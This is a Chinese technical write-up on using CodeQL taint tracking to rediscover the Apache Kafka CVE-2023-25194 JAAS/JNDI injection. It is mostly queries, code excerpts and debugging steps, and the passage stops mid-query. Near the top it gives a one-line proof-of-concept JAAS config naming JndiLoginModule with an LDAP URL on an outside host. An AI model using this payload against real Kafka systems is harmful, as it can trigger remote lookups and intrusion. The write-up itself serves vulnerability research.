CodeQL 分析Apache Kafka CVE-2023-25194

CVE-2023-25194 是jaas 的通用问题,如果可以自定义jaas config,就可以触发漏洞。是否能够通过自动化发现该漏洞?如果可能,那么也就可以自动化横向分析类似问题。

本文假设读者师傅们已经能够简单使用codeql,比如codeql的source\sink概念,以及data-flow污点分析及其isAdditionalTaintStep的使用。

0x01 CVE-2023-25194

POC:
com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://kafka2.1.dns.m0d9.me

1.1 LoginContext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
public class LoginContext {
    private Configuration config;
    private ModuleInfo[] moduleStack;
	// 注意参数config,最终会流向JndiLoginModule#userProvider,作为ctx.lookup参数
	public LoginContext(String name, Subject subject,
                        CallbackHandler callbackHandler,
                        Configuration config) throws LoginException {
       	...
        this.config = config;
		...
        init(name);
		...
	}
    private void init(String name) throws LoginException {
        AppConfigurationEntry[] entries = config.getAppConfigurationEntry(name);
        ...
        moduleStack = new ModuleInfo[entries.length];
        for (int i = 0; i < entries.length; i++) {
            // clone returned array
            moduleStack[i] = new ModuleInfo
                                (new AppConfigurationEntry
                                        (entries[i].getLoginModuleName(),
                                        entries[i].getControlFlag(),
                                        entries[i].getOptions()),
                                null);
        }
        ...
    }
    public void login() throws LoginException {
    	...
            invokePriv(LOGIN_METHOD);
        ...
	}
    private void invokePriv(final String methodName) throws LoginException {
    	...
                        invoke(methodName);
        ...
	}
    private void invoke(String methodName) throws LoginException {
        for (int i = moduleIndex; i < moduleStack.length; i++, moduleIndex++) {
        		...
                	// JndiLoginModule#initialize
                    Object[] initArgs = {subject,
                                        callbackHandler,
                                        state,
                                        moduleStack[i].entry.getOptions() };
                    methods = moduleStack[i].module.getClass().getMethods();
                ...
                // JndiLoginModule#login
                boolean status = ((Boolean)methods[mIndex].invoke
                                (moduleStack[i].module, args)).booleanValue();

1.2 JndiLoginModule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
public class JndiLoginModule implements LoginModule {
	private String userProvider;

	public void initialize(Subject subject, CallbackHandler callbackHandler,
                           Map<String,?> sharedState,
                           Map<String,?> options) {
		...
        this.options = options;
        userProvider = (String)options.get(USER_PROVIDER);
		...
	}
	public boolean login() throws LoginException {
		...
                attemptAuthentication(true);
		...
	}
	private void attemptAuthentication(boolean getPasswdFromSharedState){
		...
			InitialContext iCtx = new InitialContext();
            ctx = (DirContext)iCtx.lookup(userProvider);
		...
	}

1.3 调用栈

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
attemptAuthentication:502, JndiLoginModule (com.sun.security.auth.module)
login:303, JndiLoginModule (com.sun.security.auth.module)
invoke:747, LoginContext (javax.security.auth.login)
run:672, LoginContext$4 (javax.security.auth.login)
run:670, LoginContext$4 (javax.security.auth.login)
doPrivileged:-1, AccessController (java.security)
invokePriv:670, LoginContext (javax.security.auth.login)
login:581, LoginContext (javax.security.auth.login)
login:60, AbstractLogin (org.apache.kafka.common.security.authenticator)
<init>:62, LoginManager (org.apache.kafka.common.security.authenticator)
acquireLoginManager:105, LoginManager (org.apache.kafka.common.security.authenticator)
configure:170, SaslChannelBuilder (org.apache.kafka.common.network)
create:192, ChannelBuilders (org.apache.kafka.common.network)
clientChannelBuilder:81, ChannelBuilders (org.apache.kafka.common.network)
createChannelBuilder:105, ClientUtils (org.apache.kafka.clients)
newSender:517, KafkaProducer (org.apache.kafka.clients.producer)
<init>:460, KafkaProducer (org.apache.kafka.clients.producer)
<init>:291, KafkaProducer (org.apache.kafka.clients.producer)
<init>:274, KafkaProducer (org.apache.kafka.clients.producer)
doBuild:1348, Worker$SourceTaskBuilder (org.apache.kafka.connect.runtime)
build:1255, Worker$TaskBuilder (org.apache.kafka.connect.runtime)
startTask:672, Worker (org.apache.kafka.connect.runtime)
startSourceTask:567, Worker (org.apache.kafka.connect.runtime)
startTask:397, StandaloneHerder (org.apache.kafka.connect.runtime.standalone)
createConnectorTasks:381, StandaloneHerder (org.apache.kafka.connect.runtime.standalone)
createConnectorTasks:375, StandaloneHerder (org.apache.kafka.connect.runtime.standalone)
updateConnectorTasks:432, StandaloneHerder (org.apache.kafka.connect.runtime.standalone)
lambda$putConnectorConfig$2:232, StandaloneHerder (org.apache.kafka.connect.runtime.standalone)

0x02 CodeQL 初探

2.1 Sink

如上文,sink点是LoginContext构造函数的第四个参数

1
2
3
4
5
6
7
8
override predicate isSink(DataFlow::Node sink) {
    exists( 
        ConstructorCall cc|
        cc.getConstructor().getDeclaringType().getASupertype*().hasQualifiedName("javax.security.auth.login", "LoginContext")
        and sink.asExpr() = cc.getArgument(3)
        and cc.getNumArgument() = 4
    )
}

upload successful

2.2 Source

kafka 遵循JAX-RS实现的REST API,codeql 暂不支持此类source,需要自己实现。

以ConnectorsResource.java 为例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import javax.ws.rs.Path;
import javax.ws.rs.POST;

    @POST
    @Path("/")
    @Operation(summary = "Create a new connector")
    public Response createConnector(final @Parameter(hidden = true) @QueryParam("forward") Boolean forward,
                                    final @Context HttpHeaders headers,
                                    final CreateConnectorRequest createRequest) throws Throwable {
        // Trim leading and trailing whitespaces from the connector name, replace null with empty string
        // if no name element present to keep validation within validator (NonEmptyStringWithoutControlChars
        // allows null values)
        String name = createRequest.name() == null ? "" : createRequest.name().trim();

        Map<String, String> configs = createRequest.config();
        checkAndPutConnectorConfigName(name, configs);

        FutureCallback<Herder.Created<ConnectorInfo>> cb = new FutureCallback<>();
        herder.putConnectorConfig(name, configs, false, cb);

有PATH修饰的方法的参数,我们认为其为污点传播source点。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
private class JavaxWSRSSource extends RemoteFlowSource {
    JavaxWSRSSource(){
        exists( 
            Method m, Annotation a | 
            m.getAParameter() = this.asParameter()
            and m.getFile().getAbsolutePath().matches("%ConnectorsResource.java")
            and a.getType().hasQualifiedName("javax.ws.rs", "Path")
        )
    }
    override string getSourceType() { result = "javax.ws.rs" }
}

    override predicate isSource(DataFlow::Node src) { 
        src instanceof RemoteFlowSource 
    }

Tips: src instanceof RemoteFlowSource, 包含了RemoteFlowSource的子类

upload successful

2.3 First Try

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
/**
 * @kind path-problem
 */

import java
import DataFlow::PathGraph
import semmle.code.java.dataflow.FlowSources

private class JavaxWSRSSource extends RemoteFlowSource {
    JavaxWSRSSource(){
        exists( 
            Method m, Annotation a | 
            m.getAParameter() = this.asParameter()
            and m.getFile().getAbsolutePath().matches("%ConnectorsResource.java")
            and a.getType().hasQualifiedName("javax.ws.rs", "Path")
        )
    }
    override string getSourceType() { result = "javax.ws.rs" }
}


class VulConfig extends TaintTracking::Configuration {
    VulConfig() { this = "jaas vul" }

    override predicate isSource(DataFlow::Node src) { 
        src instanceof JavaxWSRSSource
    }

    override predicate isSink(DataFlow::Node sink) {
        // JDK漏洞触发点:new LoginContext(,,,configuration)
        exists( 
            ConstructorCall cc|
            cc.getConstructor().getDeclaringType().getASupertype*().hasQualifiedName("javax.security.auth.login", "LoginContext")
            and sink.asExpr() = cc.getArgument(3)
            and cc.getNumArgument() = 4
        )
    }
}

from VulConfig config, DataFlow::PathNode source, DataFlow::PathNode sink
where config.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@.", source.getNode(), "user input"

妥妥的,毫无疑问,不会有结果

upload successful

0x03 How to Debug CodeQL?

中间节点断开是codeql 常见的问题,可以通过isAdditionalTaintStep 将断掉的污点链串起来。

问题是如何判断污点链在哪里断掉的?

  • 好消息是官方提供了partial flow 方式进行对data-flow 的Debug,参考【1】
  • 坏消息是官方提供demo语法太老了,不支持新的codeql

3.1 partial flow - Old

partial flow支持正向搜索与反向搜索,以正向搜索为例,它的污点不关心是否sink,会一直传播,直到到达explorationLimit或者传播不下去,才会停止。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
/**
 * @kind path-problem
 */
import java
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PartialPathGraph

class MyTaintTrackingConfig extends TaintTracking::Configuration {
    MyTaintTrackingConfig() { this = "jaas vul" }

    override int explorationLimit() { result = 5 }

    override predicate isSource(DataFlow::Node source) { 
        exists(Class c| 
            c.getAField() = source.asExpr().(FieldAccess).getField()
            and c.hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
            and source.asExpr().(FieldRead).getField().hasName("jaasContexts")
            and source.asExpr().getEnclosingCallable().hasName("configure")
        )
    }

    override predicate isSink(DataFlow::Node sink) {
        // JDK漏洞触发点:new LoginContext(,,,configuration)
        exists( 
            ConstructorCall cc|
            cc.getConstructor().getDeclaringType().getASupertype*().hasQualifiedName("javax.security.auth.login", "LoginContext")
            and sink.asExpr() = cc.getArgument(3)
            and cc.getNumArgument() = 4
        )
    }
}
    
from MyTaintTrackingConfig cfg, DataFlow::PartialPathNode source, DataFlow::PartialPathNode sink
where cfg.hasPartialFlow(source, sink, _) 
select sink, source, sink, "Partial flow from unsanitized user data"
  • 反向搜索用hasPartialFlowRev
  • explorationLimit 是最大的传播深度

3.2 partial flow - New

具体版本未考证,codeql 2.13.1已经不支持以上的方式,如果要用partial flow调试,可以参考以下的例子。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
/**
 * @kind path-problem
 */
import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.dataflow.FlowSources
import DataFlow

module Config implements ConfigSig {
    predicate isSource(DataFlow::Node source) { 
        exists(Class c| 
            c.getAField() = source.asExpr().(FieldAccess).getField()
            and c.hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
            and source.asExpr().(FieldRead).getField().hasName("jaasContexts")
            and source.asExpr().getEnclosingCallable().hasName("configure")
        )
    }

    predicate isSink(DataFlow::Node sink) {
        // JDK漏洞触发点:new LoginContext(,,,configuration)
        exists( 
            ConstructorCall cc|
            cc.getConstructor().getDeclaringType().getASupertype*().hasQualifiedName("javax.security.auth.login", "LoginContext")
            and sink.asExpr() = cc.getArgument(3)
            and cc.getNumArgument() = 4
        )
    }
}

int explorationLimit() { result = 5 }

module PartialFlow = Global<Config>::FlowExploration<explorationLimit/0>;
import PartialFlow::PartialPathGraph

from PartialFlow::PartialPathNode source, int dist, PartialFlow::PartialPathNode sink
where PartialFlow::partialFlow(source, sink, dist) 
select source, sink, sink, "Partial flow from unsanitized user data"
  • partial flow 结果也不可全信,原因未知
  • explorationLimit 可以从小往大依次尝试,可以从5开始,很容易结果多达几个G
  • VScode的结果不方便搜索,可以直搜索sarif/csv结果
  • 猜测可能类似最短路径之类的搜索算法,如果有更短的路径,就会丢弃更复杂的,会造成遗漏,可以用isSanitizer 来进行过滤

3.3 Manual Debug

当partial flow也无效果时,那么只能尝试最笨的办法了,自己替换isSource / isSink 的条件,选择对应调用栈中的Expr,依次排查。

Trick: 限制污点位置

1
2
3
4
# 限制sink点在某个类内
sink.asExpr().getLocation().getFile().getRelativePath().matches("%Login.java")
# 限制sink点在某个函数内
sink.asExpr().getEnclosingCallable().hasName("login")

0x04 Run CodeQL

4.1 Backward Analysis

选择调用栈的一个中间节点,以LoginManager#acquireLoginManager第一个参数config作为source点。

4.1.1 LoginManager#acquireLoginManager

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
/**
 * @kind path-problem
 */

 import java
 import semmle.code.java.security.RequestForgeryConfig
 import DataFlow::PathGraph
 import semmle.code.java.dataflow.FlowSources
 import semmle.code.java.dataflow.internal.DataFlowImplCommon as DataFlowImplCommon
 import semmle.code.java.dataflow.internal.DataFlowPrivate
 import semmle.code.java.dataflow.internal.DataFlowNodes
 

private class JAASSource extends RemoteFlowSource {
    JAASSource(){
        exists(
            Method m | m.getParameter(0) = this.asParameter() |
            m.getDeclaringType*().hasQualifiedName("org.apache.kafka.common.security.authenticator", "LoginManager")
            and m.hasName("acquireLoginManager")
        )
    }
    override string getSourceType() { result = "jaas" }
}

 
class VulConfig extends TaintTracking::Configuration {
    VulConfig() { this = "jaas vul" }

    override predicate isSource(DataFlow::Node src) { 
        src instanceof JAASSource
    }

    override predicate isSink(DataFlow::Node sink) {
        // JDK漏洞触发点:new LoginContext(,,,configuration)
        exists( 
            ConstructorCall cc|
            cc.getConstructor().getDeclaringType().getASupertype*().hasQualifiedName("javax.security.auth.login", "LoginContext")
            and sink.asExpr() = cc.getArgument(3)
            and cc.getNumArgument() = 4
        )
    }
 }
 
 from VulConfig config, DataFlow::PathNode source, DataFlow::PathNode sink
 where config.hasFlowPath(source, sink)
 select sink.getNode(), source, sink, "$@.", source.getNode(), "user input"

upload successful

结论:LoginManager#acquireLoginManager的第一个参数config 可以最终传递给最终sink点

4.1.2 SaslChannelBuilder#configure

configs参数

继续往上回溯一级,到SaslChannelBuilder#configure的第一个参数configs,将source改成

1
2
3
4
5
6
7
JAASSource(){
    exists(
        Method m | m.getParameter(0) = this.asParameter() |
        m.getDeclaringType*().hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
        and m.hasName("configure")
    )
}

再次运行无结果

这是因为仅仅SaslChannelBuilder#configure 参数configs 是不够的,实际的污点应该是SaslChannelBuilder#jaasContexts 属性,在单步定位的时候,需要注意此类问题,具体是哪个参数是污点。

upload successful

jaasContexts 属性
1
2
3
4
5
6
7
JAASSource(){
    exists(Class c| 
        c.getAField() = this.asExpr().(FieldAccess).getField()
        and c.hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
        and this.asExpr().(FieldRead).getField().hasName("jaasContexts")
    )
}

再次运行仍然无结果。

基本可以判断是SaslChannelBuilder#configure 这一步污点断了

Confuse: 1+1 != 2

试试SaslChannelBuilder#configure 能否到 LoginManager#acquireLoginManager。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
 JAASSource(){
     exists(Class c| 
         c.getAField() = this.asExpr().(FieldAccess).getField()
         and c.hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
         and this.asExpr().(FieldRead).getField().hasName("jaasContexts")
     )
     or
     exists(
         Method m | m.getParameter(0) = this.asParameter() |
         m.getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
         and m.hasName("configure")
     )
}
...
override predicate isSink(DataFlow::Node sink) {
     exists(
         Method m | 
         m.getParameter(0) = sink.asParameter()
         and m.getDeclaringType().hasQualifiedName("org.apache.kafka.common.security.authenticator", "LoginManager")
         and m.hasName("acquireLoginManager")
     )
}
...

upload successful

疑问:SaslChannelBuilder#configure -> LoginManager#acquireLoginManager -> LoginContext(,,,configuration) 单步都可以,为什么合起来就不行?

思路:

  1. 排查当前合并起来不连通的问题
  2. 继续往上尝试

4.1.3 ChannelBuilders#create

继续往上回溯一级,到ChannelBuilders#create,试试

ChannelBuilders#create -> LoginContext(,,,configuration)
1
2
3
4
5
6
7
JAASSource(){
    exists(
        Method m | m.getParameter(0) = this.asParameter() |
        m.getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "SaslChannelBuilder")
        and m.hasName("configure")
    )
}

运行无结果

ChannelBuilders#create -> LoginManager#acquireLoginManager
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
private class JAASSource extends RemoteFlowSource {
    JAASSource(){
        exists(
            Method m | 
            m.getParameter(3) = this.asParameter()
            and m.getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "ChannelBuilders")
            and m.hasName("create")
        )
    }
    override string getSourceType() { result = "jaas" }
}

class VulConfig extends TaintTracking::Configuration {
     VulConfig() { this = "jaas vul" }

     override predicate isSource(DataFlow::Node src) { 
        src instanceof JAASSource
    }
 
     override predicate isSink(DataFlow::Node sink) {
        exists(
            Method m | 
            m.getParameter(0) = sink.asParameter()
            and m.getDeclaringType().hasQualifiedName("org.apache.kafka.common.security.authenticator", "LoginManager")
            and m.hasName("acquireLoginManager")
        )
     }
 }

运行也无果。

4.2 Forward Analysis

换个思路,看看JAX-RS的污点能传到哪

4.2.1 StandaloneHerder#createConnectorTasks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
JAASSource(){
    exists( 
        Method m, Annotation a | 
        m.getAParameter() = this.asParameter()
        and m.getFile().getAbsolutePath().matches("%ConnectorsResource.java")
        and a.getType().hasQualifiedName("javax.ws.rs", "Path")
    )
}
...
override predicate isSink(DataFlow::Node sink) {
    exists( 
        MethodAccess ma | 
        ma.getAnArgument() = sink.asExpr()
        and ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.kafka.connect.runtime.standalone", "StandaloneHerder")
        and ma.getMethod().hasName("createConnectorTasks")
    )
}

upload successful

4.2.2 StandaloneHerder#startTask

1
2
3
4
5
6
7
8
override predicate isSink(DataFlow::Node sink) {
    exists( 
        Method m | 
        m.getAParameter() = sink.asParameter()
        and m.getDeclaringType().hasQualifiedName("org.apache.kafka.connect.runtime.standalone", "StandaloneHerder")
        and m.hasName("startTask")
    )
}

运行无结果。

0x05 Failed Partial Debug Experience

总结下遇到的3个问题

  1. JAXRSWSSource 只能传播到StandaloneHerder#createConnectorTasks,但是到不了StandaloneHerder#startTask
  2. LoginManager#acquireLoginManager可以到最终的sink LoginContext(,,,Configuration),但是ChannelBuilders#create 到不了LoginManager#acquireLoginManager
  3. SaslChannelBuilder 到不了LoginContext(,,,Configuration),但是可以到LoginManager#acquireLoginManager

针对问题2,用Codeql Debug 来定位具体传播断点。

5.1 ChannelBuilders#create

upload successful

1
2
3
4
5
6
7
8
9
10
11
12
13
14
private static ChannelBuilder create(SecurityProtocol securityProtocol,
                                     Mode mode,
                                     JaasContext.Type contextType,
                                     AbstractConfig config,
                                     ListenerName listenerName,
                                     boolean isInterBrokerListener,
                                     String clientSaslMechanism,
                                     boolean saslHandshakeRequestEnable,
                                     CredentialCache credentialCache,
                                     DelegationTokenCache tokenCache,
                                     Time time,
                                     LogContext logContext,
                                     Supplier<ApiVersionsResponse> apiVersionSupplier) {
    Map<String, Object> configs = channelBuilderConfigs(config, listenerName);

结论:没有走出channelBuilderConfigs?

channelBuilderConfigs
upload successful

valuesWithPrefixOverride
upload successful

疑点

  1. valuesWithPrefixOverride 是当作map的一个元素,是否能够继续污点传播
  2. config entryset filter 这种语法,是否还能够支持。

5.2 补充channelBuilderConfigs

1
2
3
4
5
6
7
8
override predicate isAdditionalTaintStep(DataFlow::Node fromNode, DataFlow::Node toNode) {
    exists( MethodAccess ma| 
        ma = toNode.asExpr()
        and ma.getArgument(0) = fromNode.asExpr()
        and ma.getMethod().hasName("channelBuilderConfigs")
        and ma.getFile().getBaseName() = "ChannelBuilders.java"
    )
}

发现还是不行

5.3 Partial Debug Again

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
predicate isSource(DataFlow::Node source) { 
    // ChannelBuilders#create config 参数能传播到哪
    // exists( 
    //     MethodAccess ma | 
    //     ma.getMethod().getParameter(3) = source.asParameter()
    //     and ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "ChannelBuilders")
    //     and ma.getMethod().hasName("create")
    // )
    // 这次以channelBuilderConfigs 返回为起点
    exists( 
        MethodAccess ma | 
        ma = source.asExpr()
        and ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "ChannelBuilders")
        and ma.getMethod().hasName("channelBuilderConfigs")
    )
}
...
// Partial Debug 结果太多,加些过滤条件
predicate isBarrier(DataFlow::Node node){
    exists( MethodAccess ma|
        ma = node.asExpr()
        and ma.getLocation().getFile().getRelativePath().matches("%/src/test/%")
    )
    or exists( 
        Method m| 
        m.getParameter(3) = node.asParameter()
        and m.hasName("acquireLoginManager")
        and node.asParameter().hasName("configs")
    )
}

发现并未传播至jaasContext
upload successful

5.4 ChannelBuilders#create -> LoginManager#acquireLoginManager

isAdditionalTaintStep 继续加上loadServerContext

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
/**
 * @kind path-problem
 */
import java
import DataFlow::PathGraph
import semmle.code.java.dataflow.FlowSources

private class JAASSource extends RemoteFlowSource {
    JAASSource(){
        exists( 
            MethodAccess ma | 
            ma.getMethod().getParameter(3) = this.asParameter()
            and ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "ChannelBuilders")
            and ma.getMethod().hasName("create")
        )
    }
    override string getSourceType() { result = "jaas" }
}


class VulConfig extends TaintTracking::Configuration {
    VulConfig() { this = "jaas vul" }
 
    override predicate isSource(DataFlow::Node src) { src instanceof JAASSource }
 
    override predicate isSink(DataFlow::Node sink) {
        exists(
            Method m | 
            m.getParameter(0) = sink.asParameter()
            and m.getDeclaringType*().hasQualifiedName("org.apache.kafka.common.security.authenticator", "LoginManager")
            and m.hasName("acquireLoginManager")
        )
    }

    override predicate isAdditionalTaintStep(DataFlow::Node fromNode, DataFlow::Node toNode) {
        exists( MethodAccess ma| 
            ma = toNode.asExpr()
            and ma.getArgument(0) = fromNode.asExpr()
            and ma.getMethod().hasName("channelBuilderConfigs")
            and ma.getFile().getBaseName() = "ChannelBuilders.java"
        )
        or 
        exists(
            MethodAccess ma|
            ma = toNode.asExpr()
            and ma.getArgument(2) = fromNode.asExpr()
            and ma.getMethod().hasName("loadServerContext")
        )
    }
}
 
from VulConfig config, DataFlow::PathNode source, DataFlow::PathNode sink
where config.hasFlowPath(source, sink)
select sink.getNode(), source, sink, "$@.", source.getNode(), "user input"

upload successful

虽然走通了ChannelBuilders#create -> LoginManager#acquireLoginManager,但是还存在问题

  • 事后发现拿掉isAdditionalTaintStep条件1channelBuilderConfigs也行
  • 后续到LoginContext(,,,Configuration) 还是不能串起来

结论:

  • Partial Debug结果不可全信

0x06 “Dumb” Way to Debug

除以上Partial Debug 结果不全的结论外,其搜索结果如果不加限制,在这个case上sarif 结果动则上G,搜索也困难,改用Expr.getLocation().getFile() 限制sink 所属文件进行尝试。

6.1 Sink Expr in JaasContext

1
2
3
4
5
6
7
8
9
10
11
JAASSource(){
    exists( 
        MethodAccess ma | 
        ma.getMethod().getParameter(3) = this.asParameter()
        and ma.getMethod().getDeclaringType().hasQualifiedName("org.apache.kafka.common.network", "ChannelBuilders")
        and ma.getMethod().hasName("create")
    )
}
override predicate isSink(DataFlow::Node sink) {
    sink.asExpr().getLocation().getFile().getRelativePath().matches("%JaasContext.java")
}

upload successful

  • 可以看到,没有用isAdditionalTaintStep,就可以到JaasConfig

注意:实际污点应该是configuration,而不是dynamicJaasConfig

6.2 Discovery: StreamTokenizer

upload successful

upload successful

发现:

  • dynamicJaasConfig已经被打标成污点
  • 但是实际的污点JaasContext#configuration 并未被打标成污点
  • 只隔了一条语句:new JaasConfig(globalContextName, dynamicJaasConfig.value());
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
public JaasConfig(String loginContextName, String jaasConfigParams) {
    StreamTokenizer tokenizer = new StreamTokenizer(new StringReader(jaasConfigParams));
    tokenizer.slashSlashComments(true);
    tokenizer.slashStarComments(true);
    tokenizer.wordChars('-', '-');
    tokenizer.wordChars('_', '_');
    tokenizer.wordChars('$', '$');

    try {
        configEntries = new ArrayList<>();
        while (tokenizer.nextToken() != StreamTokenizer.TT_EOF) {
            configEntries.add(parseAppConfigurationEntry(tokenizer));
        }
        if (configEntries.isEmpty())
            throw new IllegalArgumentException("Login module not specified in JAAS config");

        this.loginContextName = loginContextName;

    } catch (IOException e) {
        throw new KafkaException("Unexpected exception while parsing JAAS config");
    }
}

继续看看,将JaasConfig作为sink文件

1
2
sink.asExpr().getLocation().getFile().getRelativePath().matches("%JaasConfig.java")

upload successful

到这里发现tokenizer 没有被污染,StringReader 不大可能,基本可以定位是StreamTokenizer 的问题。

6.2.3 Add StreamTokenizer Support

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
override predicate isAdditionalTaintStep(DataFlow::Node fromNode, DataFlow::Node toNode) {
    exists(ConstructorCall cc |
        cc.getAnArgument() = fromNode.asExpr()
        and cc = toNode.asExpr()
        and cc.getConstructor().getDeclaringType().hasQualifiedName("java.io", "StreamTokenizer")
    )
    or 
    exists(VarAccess va, ClassOrInterface ci |
        va.getQualifier().getType().getFile() = ci.getFile()
        and ci.getAField().hasName("sval")
        and ci.hasName("StreamTokenizer")
        and va.getVariable().hasName("sval")
        and va = toNode.asExpr()
        and va.getQualifier() = fromNode.asExpr()
    )

继续排查,发现在这里断掉了

upload successful

6.2.4 Add AppConfigurationEntry Support

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
 override predicate isAdditionalTaintStep(DataFlow::Node fromNode, DataFlow::Node toNode) {
     exists(ConstructorCall cc |
         cc.getAnArgument() = fromNode.asExpr()
         and cc = toNode.asExpr()
         and cc.getConstructor().getDeclaringType().hasQualifiedName("java.io", "StreamTokenizer")
     )
     or 
     exists(VarAccess va, ClassOrInterface ci |
         va.getQualifier().getType().getFile() = ci.getFile()
         and ci.getAField().hasName("sval")
         and ci.hasName("StreamTokenizer")
         and va.getVariable().hasName("sval")
         and va = toNode.asExpr()
         and va.getQualifier() = fromNode.asExpr()
     )
     or 
     exists(ConstructorCall cc |
         cc.getAnArgument() = fromNode.asExpr()
         and cc = toNode.asExpr()
         and cc.getConstructor().getDeclaringType().hasQualifiedName("javax.security.auth.login", "AppConfigurationEntry")
     )
     or
     exists(MethodAccess ma |  
         ma.getQualifier() = fromNode.asExpr()
         and ma = toNode.asExpr()
         and ma.getMethod().hasName("getOptions")
         and ma.getQualifier().getType().hasName("AppConfigurationEntry")
     )
}

增加以上条件,再次运行

upload successful

6.2.5 Confuse: Only KerberosLogin?

观察路径,发现已经有到KerberosLogin configuration 的节点,但是并无到AbstractLogin的 configuration,而AbstractLogin 的configuration 就是最终的sink点。[黑人问号???]

继续尝试,如果把sink点条件改为以下,会发现都不是想要的

  • LoginContext
  • AbstractLogin

Why?

0x07 Taint O != Taint O.field

7.1 Simple Demo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
public class DemoNoneField {
    
    private String f;

    public void setF(String f){
        this.f = f;
    }

    public String getF(){
        return this.f;
    }

    public DemoNoneField(){
        this.f = "";
    }

    public static void main(String[] args) throws Exception {
        DemoNoneField a = new DemoNoneField();
        String tt = args[0];
        a.setF(tt);
        System.out.println(a);
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/**
 * @kind path-problem
 */
import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.dataflow.TaintTracking
import DataFlow::PathGraph

class MyTaintTrackingConfig extends TaintTracking::Configuration {
    MyTaintTrackingConfig() { this = "MyTaintTrackingConfig" }

    override predicate isSource(DataFlow::Node source) {
        exists(Method m | 
            m.hasName("main")
            and m.getAParameter() = source.asParameter()
        )
    }

    override predicate isSink(DataFlow::Node sink) {
        exists(MethodAccess ma |             
            sink.asExpr() = ma.getAnArgument()
            and ma.getCallee().getDeclaringType().hasQualifiedName("java.io", "PrintStream")
        )
    }    
}
  
from MyTaintTrackingConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink
where cfg.hasFlowPath(source, sink)
select sink, source, sink, "vuln"

运行会发现并无结果,实际上即使给DemoNoneField加上toString,对这个codeql query结果也没有影响,因为在codeql中,Object和Object.field 属于是不同的污点。

7.2 Implicit Flow

参考【4】中的解释

隐式流:隐式流分析是分析污点标记如何随程序中变量之间的控制依赖关系传播,也就是分析污点标记如何从条件指令传播到其所控制的语句。
显式流:显式流分析就是分析污点标记如何随程序中变量之间的数据依赖关系传播。也就是所谓的数据流传播。

upload successful

7.3 CodeQL allowImplicitRead

predicate allowImplicitRead ( Node node , ContentSet c )

字面意思是隐式读,个人理解是用于判断节点Node及其内部属性的传播关系,和传统意义的隐式流分析还有些不一样。

  1. Node 是DataFlow::Node,数据流分析的任意节点即可
  2. ContentSet 有以下类型
    • FieldContent
    • ArrayContent
    • CollectionContent
    • MapKeyContent
    • MapValueContent
    • SyntheticFieldContent
1
2
3
4
5
6
7
8
9
10
11
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
    super.allowImplicitRead(node, c)
    or 
    ( 
        this.isSink(node)
        and 
        c instanceof DataFlow::FieldContent
        // and c.(DataFlow::FieldContent).getField().hasName("f")
        and c.(DataFlow::FieldContent).getField().getDeclaringType().hasName("DemoNoneField")
    )
}

upload successful

0x08 Ultimate Success

8.1 Apply allowImplicitRead

上一节中,codeql 对于进入KerberosLogin configure的参数污点描述如下
configuration : JaasConfig [configEntries, <element>] : AppConfigurationEntry

upload successful

个人理解如下:

  • configuration:污点参数名
  • JaasConfig [configEntries, <element>]: 参数类型为JaasConfig,其Field有configEntries,是个Collection,<element>里面的才是污点
  • AppConfigurationEntry:污点的类型
1
2
3
4
5
6
7
8
9
10
11
12
13
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
    super.allowImplicitRead(node, c)
    or
    (
